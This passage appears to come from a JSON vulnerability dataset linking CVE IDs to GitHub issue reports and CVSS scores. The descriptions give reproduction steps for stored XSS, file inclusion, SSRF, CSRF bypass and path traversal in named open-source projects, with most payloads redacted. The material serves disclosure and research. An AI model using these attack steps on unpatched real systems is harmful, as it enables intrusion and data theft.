  57552. },
  57553. {
  57554. "CVE_ID": "CVE-2020-24992",
  57555. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/54",
  57556. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/54",
  57557. "Repo_new": "arterli/cmswing",
  57558. "Issue_Created_At": "2020-08-27T01:36:24Z",
  57559. "description": "Vulnerability Report: APITAG in version NUMBERTAG there are two storage XSS vulnerabilities. The first XSS vulnerablity Question and answer module. In the Question supplement function, when inserting a link, fill in \"> APITAG APITAG alert NUMBERTAG APITAG The specific location of the vulnerability is shown in the figure APITAG the submission is approved by the admin user, the vulnerability will be triggered when the administrator opens the content management page. FILETAG FILETAG",
  57560. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  57561. "severity": "MEDIUM",
  57562. "baseScore": 5.4,
  57563. "impactScore": 2.7,
  57564. "exploitabilityScore": 2.3
  57565. },
  57566. {
  57567. "CVE_ID": "CVE-2020-24994",
  57568. "Issue_Url_old": "https://github.com/libass/libass/issues/422",
  57569. "Issue_Url_new": "https://github.com/libass/libass/issues/422",
  57570. "Repo_new": "libass/libass",
  57571. "Issue_Created_At": "2020-08-27T02:18:39Z",
  57572. "description": "stack overflow on APITAG parse_tag. Description A vulnerability was found in function parse_tag in APITAG ,which allow attackers to cause a denial of service or remote code execution via a crafted file. poc URLTAG ERRORTAG",
  57573. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57574. "severity": "HIGH",
  57575. "baseScore": 8.8,
  57576. "impactScore": 5.9,
  57577. "exploitabilityScore": 2.8
  57578. },
  57579. {
  57580. "CVE_ID": "CVE-2020-24994",
  57581. "Issue_Url_old": "https://github.com/libass/libass/issues/423",
  57582. "Issue_Url_new": "https://github.com/libass/libass/issues/423",
  57583. "Repo_new": "libass/libass",
  57584. "Issue_Created_At": "2020-08-29T07:31:47Z",
  57585. "description": "stack overflow on APITAG mystrcmp. Description A vulnerability was found in function mystrcmp in APITAG ,which allow attackers to cause a denial of service or remote code execution via a crafted file. FILETAG FILETAG ERRORTAG",
  57586. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57587. "severity": "HIGH",
  57588. "baseScore": 8.8,
  57589. "impactScore": 5.9,
  57590. "exploitabilityScore": 2.8
  57591. },
  57592. {
  57593. "CVE_ID": "CVE-2020-25016",
  57594. "Issue_Url_old": "https://github.com/kornelski/rust-rgb/issues/35",
  57595. "Issue_Url_new": "https://github.com/kornelski/rust-rgb/issues/35",
  57596. "Repo_new": "kornelski/rust-rgb",
  57597. "Issue_Created_At": "2020-06-14T06:46:08Z",
  57598. "description": "APITAG is unsound. The trait assumes that an arbitrary type APITAG can be viewed (and by your personal higher power even modified!) as a byte slice. That is super unsound. Here's an example of causing UB with it: CODETAG",
  57599. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  57600. "severity": "CRITICAL",
  57601. "baseScore": 9.1,
  57602. "impactScore": 5.2,
  57603. "exploitabilityScore": 3.9
  57604. },
  57605. {
  57606. "CVE_ID": "CVE-2020-25219",
  57607. "Issue_Url_old": "https://github.com/libproxy/libproxy/issues/134",
  57608. "Issue_Url_new": "https://github.com/libproxy/libproxy/issues/134",
  57609. "Repo_new": "libproxy/libproxy",
  57610. "Issue_Created_At": "2020-09-07T17:47:52Z",
  57611. "description": "pac server can trigger unbounded recursion in url.cpp APITAG I found this in APITAG CODETAG Looks like the server that hosts the proxy authconfig file can cause libproxy to overflow the stack by sending an unending stream of characters without a newline. The PAC server should be trusted to not do that, but it's still not good. Normal use with a non malicious server looks like this: CODETAG",
  57612. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57613. "severity": "HIGH",
  57614. "baseScore": 7.5,
  57615. "impactScore": 3.6,
  57616. "exploitabilityScore": 3.9
  57617. },
  57618. {
  57619. "CVE_ID": "CVE-2020-25340",
  57620. "Issue_Url_old": "https://github.com/ntop/nDPI/issues/994",
  57621. "Issue_Url_new": "https://github.com/ntop/ndpi/issues/994",
  57622. "Repo_new": "ntop/ndpi",
  57623. "Issue_Created_At": "2020-08-26T08:51:21Z",
  57624. "description": "Memory leak in APITAG I am using nfstream to detect traffic, and the dissect option is turned on, which means that nfstream will use nDPI to complete this task. But I encountered a memory leak problem during use. Nfstream is developed based on the python language, memory leaks are rarely encountered, so I started to locate the cause. In nfstream, I located the reason for this line of code : FILETAG . In fact, the code calls the APITAG function in nDPI: FILETAG . By comparing the memory release operation in APITAG URLTAG and the prototype of the ndpi_flow_struct structure URLTAG , I think that APITAG has not completely released all the variables in ndpi_flow_struct. I think this may be the root cause of the memory leak.",
  57625. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  57626. "severity": "MEDIUM",
  57627. "baseScore": 5.5,
  57628. "impactScore": 3.6,
  57629. "exploitabilityScore": 1.8
  57630. },
  57631. {
  57632. "CVE_ID": "CVE-2020-25394",
  57633. "Issue_Url_old": "https://github.com/mozilo/mozilo2.0/issues/28",
  57634. "Issue_Url_new": "https://github.com/mozilodaseinsteigercms/mozilo2.0/issues/28",
  57635. "Repo_new": "mozilodaseinsteigercms/mozilo2.0",
  57636. "Issue_Created_At": "2020-09-08T04:17:40Z",
  57637. "description": "Cross Site Script Vulnerability on \"content\" in APITAG Admin. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Edit APITAG NUMBERTAG Insert Payload: '> APITAG NUMBERTAG Save NUMBERTAG Click Edit NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Screenshots NUMBERTAG Infor APITAG Admin: FILETAG NUMBERTAG Go to APITAG and Edit: FILETAG NUMBERTAG Insert Payload XSS: FILETAG NUMBERTAG SS Alert Message: FILETAG Desktop (please complete the following information): OS: Windows Browser Chorme Version NUMBERTAG APITAG Build NUMBERTAG bit)",
  57638. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  57639. "severity": "MEDIUM",
  57640. "baseScore": 5.4,
  57641. "impactScore": 2.7,
  57642. "exploitabilityScore": 2.3
  57643. },
  57644. {
  57645. "CVE_ID": "CVE-2020-25414",
  57646. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/469",
  57647. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/469",
  57648. "Repo_new": "monstra-cms/monstra",
  57649. "Issue_Created_At": "2020-09-03T13:11:48Z",
  57650. "description": "Monstra NUMBERTAG Local File Inclusion Vulnerability. Brief of this vulnerability There is a local File Inclusion Vulnerability in the CMS, which can be exploited by an attacker to execute PHP code Test Environment APITAG APITAG PHP NUMBERTAG mysql NUMBERTAG Affect version NUMBERTAG payload URLTAG We can create FILETAG In the web directory, the content is APITAG FILETAG FILETAG FILETAG Or we can use Apache logs NUMBERTAG use burpsuite FILETAG NUMBERTAG include log FILETAG FILETAG Reason of This Vulnerability Directly from the get parameter and include this parameter, resulting in a APITAG file\uff1a APITAG ERRORTAG As long as we assign a value to the sn variable and it is not empty, we can skip the first NUMBERTAG if APITAG variable CFG is directly assigned to APITAG and then the include method is executed, resulting in a vulnerability",
  57651. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57652. "severity": "CRITICAL",
  57653. "baseScore": 9.8,
  57654. "impactScore": 5.9,
  57655. "exploitabilityScore": 3.9
  57656. },
  57657. {
  57658. "CVE_ID": "CVE-2020-25422",
  57659. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/2",
  57660. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/2",
  57661. "Repo_new": "r0ck3t1973/xss_payload",
  57662. "Issue_Created_At": "2020-09-01T08:41:16Z",
  57663. "description": "Cross Site Script Vulnerability on APITAG Menu\" in Mara NUMBERTAG Describe the bug / An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Menu\" feature. To Reproduce / Steps to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Insert Payload: APITAG APITAG APITAG Hello world! APITAG APITAG NUMBERTAG Click Test: Alert XSS Message NUMBERTAG Save and go to Admin Panel NUMBERTAG Alert XSS Message / Expected behavior / The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page / Screenshots NUMBERTAG go to PATHTAG FILETAG NUMBERTAG Insert Payload FILETAG NUMBERTAG Click Test: Alert XSS Message FILETAG NUMBERTAG Save and go to Admin Panel NUMBERTAG Alert XSS Message FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All I Hope you fix it ASAP",
  57664. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  57665. "severity": "MEDIUM",
  57666. "baseScore": 5.4,
  57667. "impactScore": 2.7,
  57668. "exploitabilityScore": 2.3
  57669. },
  57670. {
  57671. "CVE_ID": "CVE-2020-25427",
  57672. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1406",
  57673. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1406",
  57674. "Repo_new": "gpac/gpac",
  57675. "Issue_Created_At": "2020-02-08T13:37:09Z",
  57676. "description": "Null pointer dereference in function APITAG Command : APITAG crypt FILETAG $POC out test.mp4 Version : APITAG GPAC version NUMBERTAG re NUMBERTAG g NUMBERTAG a8ef NUMBERTAG master Reproducer file : Reproducer URLTAG GDB : CODETAG",
  57677. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57678. "severity": "MEDIUM",
  57679. "baseScore": 5.5,
  57680. "impactScore": 3.6,
  57681. "exploitabilityScore": 1.8
  57682. },
  57683. {
  57684. "CVE_ID": "CVE-2020-25453",
  57685. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389",
  57686. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/389",
  57687. "Repo_new": "blackcatdevelopment/blackcatcms",
  57688. "Issue_Created_At": "2020-05-30T21:28:59Z",
  57689. "description": "CSRF Bypass. Hi ~ I find a CSRF Bypass Vulnerability ! Version NUMBERTAG Author : Noth(\u6c88\u5f67\u74bf) Step NUMBERTAG go to PATHTAG Step NUMBERTAG Use burpsuite to intercept packets Step NUMBERTAG Generate APITAG ( remove the csrf_token ==> \"\" ) Test Video : URLTAG Bypass the csrf_token to login",
  57690. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57691. "severity": "HIGH",
  57692. "baseScore": 8.8,
  57693. "impactScore": 5.9,
  57694. "exploitabilityScore": 2.8
  57695. },
  57696. {
  57697. "CVE_ID": "CVE-2020-25461",
  57698. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/441",
  57699. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/441",
  57700. "Repo_new": "moddable-opensource/moddable",
  57701. "Issue_Created_At": "2020-09-04T08:08:38Z",
  57702. "description": "SEGV at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version NUMBERTAG abb build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. FILETAG",
  57703. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57704. "severity": "HIGH",
  57705. "baseScore": 7.5,
  57706. "impactScore": 3.6,
  57707. "exploitabilityScore": 3.9
  57708. },
  57709. {
  57710. "CVE_ID": "CVE-2020-25462",
  57711. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/432",
  57712. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/432",
  57713. "Repo_new": "moddable-opensource/moddable",
  57714. "Issue_Created_At": "2020-08-31T06:06:23Z",
  57715. "description": "Heap buffer overflow at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version: de NUMBERTAG c NUMBERTAG git hash) build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. Heap buffer overflow at PATHTAG FILETAG FILETAG",
  57716. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57717. "severity": "CRITICAL",
  57718. "baseScore": 9.8,
  57719. "impactScore": 5.9,
  57720. "exploitabilityScore": 3.9
  57721. },
  57722. {
  57723. "CVE_ID": "CVE-2020-25463",
  57724. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/440",
  57725. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/440",
  57726. "Repo_new": "moddable-opensource/moddable",
  57727. "Issue_Created_At": "2020-09-04T08:06:34Z",
  57728. "description": "SEGV at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version NUMBERTAG abb build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. FILETAG",
  57729. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57730. "severity": "HIGH",
  57731. "baseScore": 7.5,
  57732. "impactScore": 3.6,
  57733. "exploitabilityScore": 3.9
  57734. },
  57735. {
  57736. "CVE_ID": "CVE-2020-25464",
  57737. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/431",
  57738. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/431",
  57739. "Repo_new": "moddable-opensource/moddable",
  57740. "Issue_Created_At": "2020-08-31T05:55:02Z",
  57741. "description": "Heap buffer overflow at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version: de NUMBERTAG c NUMBERTAG git hash) build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC function APITAG { var a = FILETAG",
  57742. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57743. "severity": "HIGH",
  57744. "baseScore": 7.5,
  57745. "impactScore": 3.6,
  57746. "exploitabilityScore": 3.9
  57747. },
  57748. {
  57749. "CVE_ID": "CVE-2020-25465",
  57750. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/442",
  57751. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/442",
  57752. "Repo_new": "moddable-opensource/moddable",
  57753. "Issue_Created_At": "2020-09-04T08:10:54Z",
  57754. "description": "SEGV at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version NUMBERTAG abb build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. FILETAG",
  57755. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57756. "severity": "HIGH",
  57757. "baseScore": 7.5,
  57758. "impactScore": 3.6,
  57759. "exploitabilityScore": 3.9
  57760. },
  57761. {
  57762. "CVE_ID": "CVE-2020-25466",
  57763. "Issue_Url_old": "https://github.com/crmeb/CRMEB/issues/22",
  57764. "Issue_Url_new": "https://github.com/crmeb/crmeb/issues/22",
  57765. "Repo_new": "crmeb/crmeb",
  57766. "Issue_Created_At": "2020-09-07T08:16:41Z",
  57767. "description": "An SSRF vulnerability leads to system access. By looking at the source code, we found a SSRF vulnerability that could read arbitrary files on a remote or local server and save them to a web server. Therefore, malicious users can download the malicious Trojan files to the web server to obtain the permissions of the web server\u3002 analysis\uff1a ERRORTAG The above code is to get the name of the file to download ERRORTAG Since the default value of the $type parameter is NUMBERTAG it will skip the if judgment directly and jump to the else judgment. The readfile method reads the value of the $url parameter and writes it to the output buffer. $content gets the content of the output buffer through the APITAG method. ERRORTAG The rest of the code is to write the contents of the read file to the web server. Recurrence of loopholes NUMBERTAG URLTAG poc: CODETAG FILETAG FILETAG",
  57768. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57769. "severity": "CRITICAL",
  57770. "baseScore": 9.8,
  57771. "impactScore": 5.9,
  57772. "exploitabilityScore": 3.9
  57773. },
  57774. {
  57775. "CVE_ID": "CVE-2020-25467",
  57776. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/163",
  57777. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/163",
  57778. "Repo_new": "ckolivas/lrzip",
  57779. "Issue_Created_At": "2020-08-26T10:22:13Z",
  57780. "description": "segmentation fault in lzo_decompress_buf, stream.c NUMBERTAG Hi, there. There is invalid memory access in lzo_decompress_buf, stream.c NUMBERTAG in the newest branch NUMBERTAG be1ffb. System: ~~~~ APITAG DISTRIB_RELEASE NUMBERTAG DISTRIB_CODENAME=xenial APITAG NUMBERTAG LTS\" ~~~~ To reproduce, run: ~~~~ lrzip t poc ~~~~ POC: FILETAG This is the output from the terminal: ~~~~ Decompressing... Segmentation fault ~~~~ This is the trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG a NUMBERTAG bp NUMBERTAG cd NUMBERTAG sp NUMBERTAG f NUMBERTAG afed NUMBERTAG T NUMBERTAG f NUMBERTAG a NUMBERTAG in lzo1x_decompress ( PATHTAG NUMBERTAG faff in lzo_decompress_buf .. APITAG NUMBERTAG faff in ucompthread .. APITAG NUMBERTAG f NUMBERTAG d6b9 in start_thread ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG c in clone ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG lzo1x_decompress Thread T1 created by T0 here NUMBERTAG f NUMBERTAG e NUMBERTAG e3 in pthread_create ( PATHTAG NUMBERTAG in create_pthread .. APITAG NUMBERTAG in fill_buffer .. APITAG NUMBERTAG in read_stream .. APITAG NUMBERTAG unknown module NUMBERTAG ABORTING ~~~~",
  57781. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  57782. "severity": "MEDIUM",
  57783. "baseScore": 5.5,
  57784. "impactScore": 3.6,
  57785. "exploitabilityScore": 1.8
  57786. },
  57787. {
  57788. "CVE_ID": "CVE-2020-25470",
  57789. "Issue_Url_old": "https://github.com/AntSwordProject/antSword/issues/256",
  57790. "Issue_Url_new": "https://github.com/antswordproject/antsword/issues/256",
  57791. "Repo_new": "antswordproject/antsword",
  57792. "Issue_Created_At": "2020-08-27T01:59:46Z",
  57793. "description": "RCE Vulnerability in View Site. APITAG Ver NUMBERTAG There is a view site function which will show cookies in UI. FILETAG FILETAG After few tests i got that it can parse html tags. FILETAG So it can also execute javascript/node codes like this. FILETAG (i used base NUMBERTAG encoded command which decodes as APITAG )",
  57794. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  57795. "severity": "MEDIUM",
  57796. "baseScore": 6.1,
  57797. "impactScore": 2.7,
  57798. "exploitabilityScore": 2.8
  57799. },
  57800. {
  57801. "CVE_ID": "CVE-2020-25540",
  57802. "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/244",
  57803. "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/244",
  57804. "Repo_new": "zoujingli/thinkadmin",
  57805. "Issue_Created_At": "2020-08-27T08:28:52Z",
  57806. "description": "APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG CODETAG APITAG \u53ef\u4ee5\u83b7\u53d6\u5230\u5f53\u524d\u7248\u672c\uff1a APITAG \uff0c\u2264\u8fd9\u4e2a\u7248\u672c\u7684\u90fd\u6709\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e URL\uff1a URLTAG URLTAG \u5217\u76ee\u5f55 APITAG \uff1a ERRORTAG \u76f4\u63a5\u628aPOST\u7684 rules \u548c ignore \u53c2\u6570\u4f20\u7ed9 APITAG \uff0c\u6839\u636e\u4e0a\u9762\u7684use\u5f15\u7528\u53ef\u4ee5\u77e5\u9053\u6587\u4ef6\u8def\u5f84\u5728 APITAG \uff1a ERRORTAG APITAG \u53ef\u4ee5\u4e0d\u7528\u5173\u6ce8\uff0c\u4ed6\u4f1a\u900f\u8fc7 APITAG \u53bb\u904d\u5386 APITAG \u6570\u7ec4\uff0c\u8c03\u7528 APITAG \u53bb\u9012\u5f52\u904d\u5386\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\uff0c\u6700\u540e\u5728\u900f\u8fc7 APITAG APITAG ERRORTAG ERRORTAG ERRORTAG APITAG URLTAG URLTAG POST: APITAG \u4e5f\u53ef\u4ee5\u4f7f\u7528 APITAG \u6765\u8fdb\u884c\u76ee\u5f55\u7a7f\u8d8a APITAG \u6f14\u793a\u7ad9\uff1a FILETAG \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6 APITAG \uff1a ERRORTAG \u9996\u5148\u4eceGET\u8bfb\u53d6 encode \u53c2\u6570\u5e76\u4f7f\u7528 APITAG \u89e3\u7801\uff1a ERRORTAG \u89e3\u5bc6UTF8\u5b57\u7b26\u4e32\u7684\uff0c\u521a\u597d\u4e0a\u9762\u6709\u4e2a\u52a0\u5bc6UTF8\u5b57\u7b26\u4e32\u7684 APITAG \uff0c\u653b\u51fb\u65f6\u76f4\u63a5\u8c03\u7528\u90a3\u4e2a\u5c31\u53ef\u4ee5\u4e86\uff1a ERRORTAG \u8ddf\u8fdb APITAG \uff0c\u6587\u4ef6\u8def\u5f84 APITAG \uff1a ERRORTAG \u9996\u5148 APITAG \u4e0d\u80fd\u591f\u662f APITAG \uff0c\u63a5\u7740\u8ddf\u8fdb APITAG \uff1a ERRORTAG \u6709\u4e00\u4e2a\u5141\u8bb8\u7684\u5217\u8868\uff1a APITAG \u4e5f\u5c31\u662f\u8bf4 APITAG \u5fc5\u987b\u8981\u4e0d\u662f APITAG APITAG APITAG \u800c APITAG APITAG APITAG \u6765\u66ff\u6362 APITAG \uff0c\u4e5f\u5c31\u662f\u4f20\u5165\uff1a APITAG APITAG APITAG Windows\u8bfb\u53d6 APITAG \uff1a FILETAG \u6f14\u793a\u7ad9\u8bfb\u53d6 APITAG \uff1a FILETAG NUMBERTAG",
  57807. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57808. "severity": "HIGH",
  57809. "baseScore": 7.5,
  57810. "impactScore": 3.6,
  57811. "exploitabilityScore": 3.9
  57812. },
  57813. {
  57814. "CVE_ID": "CVE-2020-25574",
  57815. "Issue_Url_old": "https://github.com/hyperium/http/issues/352",
  57816. "Issue_Url_new": "https://github.com/hyperium/http/issues/352",
  57817. "Repo_new": "hyperium/http",
  57818. "Issue_Created_At": "2019-11-16T16:31:23Z",
  57819. "description": "Size issue in APITAG . URLTAG APITAG URLTAG method silently overflows to NUMBERTAG in release mode. This makes it possible to shrink the size of the map to NUMBERTAG with APITAG . If the map doesn't contain any entry, it sets the mask value to APITAG which is inconsistent but doesn't create any immediate harm. If the map contains any entry, the code will call APITAG and start infinite probing in this line URLTAG . Another problem is that the assertion for APITAG doesn't exist here, so it is possible to grow the map larger than APITAG . Demonstration URLTAG",
  57820. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57821. "severity": "HIGH",
  57822. "baseScore": 7.5,
  57823. "impactScore": 3.6,
  57824. "exploitabilityScore": 3.9
  57825. },
  57826. {
  57827. "CVE_ID": "CVE-2020-25614",
  57828. "Issue_Url_old": "https://github.com/antchfx/xmlquery/issues/39",
  57829. "Issue_Url_new": "https://github.com/antchfx/xmlquery/issues/39",
  57830. "Repo_new": "antchfx/xmlquery",
  57831. "Issue_Created_At": "2020-08-29T08:57:03Z",
  57832. "description": "Denial of Service (SIGSEGV) at xmlquery.( APITAG Summary The APITAG function allows all response types/formats to be parsed _(other than XML)_, so that it can proceed to the next process (e.g. APITAG from APITAG ) without validation. Description This security issue affects all xmlquery version. Steps to Reproduce CODETAG The logs will look similar to the following: ERRORTAG Vulnerable code: URLTAG Recommended Mitigations Validates the response from URLs loaded in APITAG , if not XML format; then returns an error.",
  57833. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57834. "severity": "CRITICAL",
  57835. "baseScore": 9.8,
  57836. "impactScore": 5.9,
  57837. "exploitabilityScore": 3.9
  57838. },
  57839. {
  57840. "CVE_ID": "CVE-2020-25636",
  57841. "Issue_Url_old": "https://github.com/ansible-collections/community.aws/issues/221",
  57842. "Issue_Url_new": "https://github.com/ansible-collections/community.aws/issues/221",
  57843. "Repo_new": "ansible-collections/community.aws",
  57844. "Issue_Created_At": "2020-09-04T15:15:07Z",
  57845. "description": "aws_ssm connection plugin should namespace its file transfers. SUMMARY The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. It writes these files directly to the root of the bucket. If multiple ansible processes are running and sharing the same bucket at the same time, collisions could happen. ISSUE TYPE Bug Report COMPONENT NAME aws_ssm connection plugin ANSIBLE VERSION ansible NUMBERTAG rc2 config file = PATHTAG configured module search path = PATHTAG PATHTAG ansible python module location = PATHTAG executable location = PATHTAG python version NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG CONFIGURATION n/a OS / ENVIRONMENT debian NUMBERTAG STEPS TO REPRODUCE NUMBERTAG use the aws_ssm plugin NUMBERTAG look at the s3 bucket it used NUMBERTAG observe that the files are not namespaced by instance id EXPECTED RESULTS The plugin should transfer files in namespaced keys (folders) to avoid collisions. The namespace key should be configurable so specific IAM policies can be granted. ACTUAL RESULTS Files are written to the root of the s3 bucket.",
  57846. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  57847. "severity": "HIGH",
  57848. "baseScore": 7.1,
  57849. "impactScore": 5.2,
  57850. "exploitabilityScore": 1.8
  57851. },
  57852. {
  57853. "CVE_ID": "CVE-2020-25640",
  57854. "Issue_Url_old": "https://github.com/amqphub/amqp-10-resource-adapter/issues/13",
  57855. "Issue_Url_new": "https://github.com/amqphub/amqp-10-resource-adapter/issues/13",
  57856. "Repo_new": "amqphub/amqp-10-resource-adapter",
  57857. "Issue_Created_At": "2020-09-10T14:27:51Z",
  57858. "description": "JMS Connection password logged in cleartext. In the following log message, I can see my password in clear. Twice. ERRORTAG",
  57859. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  57860. "severity": "MEDIUM",
  57861. "baseScore": 5.3,
  57862. "impactScore": 3.6,
  57863. "exploitabilityScore": 1.6
  57864. },
  57865. {
  57866. "CVE_ID": "CVE-2020-25649",
  57867. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2589",
  57868. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2589",
  57869. "Repo_new": "fasterxml/jackson-databind",
  57870. "Issue_Created_At": "2020-01-09T09:23:57Z",
  57871. "description": "NUMBERTAG APITAG is not enough to stop expansion. As per description: URLTAG and URLTAG is not enough to stop expansion of entities. Depending on provider(xerces) being used it might work with current APITAG or not. If JDK default is used, it wont allow to expand entities, however, if other provider from classpath is used it might, for instance, JDK8 does not allow( iirc) but xerces NUMBERTAG does. Reference: URLTAG I tinkered a bit with databind classes and I had something like: CODETAG",
  57872. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  57873. "severity": "HIGH",
  57874. "baseScore": 7.5,
  57875. "impactScore": 3.6,
  57876. "exploitabilityScore": 3.9
  57877. },
  57878. {
  57879. "CVE_ID": "CVE-2020-25658",
  57880. "Issue_Url_old": "https://github.com/sybrenstuvel/python-rsa/issues/165",
  57881. "Issue_Url_new": "https://github.com/sybrenstuvel/python-rsa/issues/165",
  57882. "Repo_new": "sybrenstuvel/python-rsa",
  57883. "Issue_Created_At": "2020-10-26T18:16:44Z",
  57884. "description": "CVETAG Bleichenbacher style timing oracle in PKCS NUMBERTAG decryption code. Current PKCS NUMBERTAG decryption code: URLTAG performs the checks on the decrypted value in turn, aborting as soon as first error is found, it also raises an exception in case of errors. This likely provides enough of a timing side channel to mount a Bleichenbacher style attack. While it's unlikely that a completely side channel free implementation is possible (see URLTAG ), it should be possible to minimise the side channel by making at least the execution path the same irrespective of previous checks and by providing an API that returns a randomly generated secret in case of error (instead of leaking the timing side channel by rising an exception) for uses that feed the decrypted value directly to a hash or use it as an symmetric key.",
  57885. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57886. "severity": "MEDIUM",
  57887. "baseScore": 5.9,
  57888. "impactScore": 3.6,
  57889. "exploitabilityScore": 2.2
  57890. },
  57891. {
  57892. "CVE_ID": "CVE-2020-25663",
  57893. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1723",
  57894. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1723",
  57895. "Repo_new": "imagemagick/imagemagick",
  57896. "Issue_Created_At": "2019-10-06T12:41:15Z",
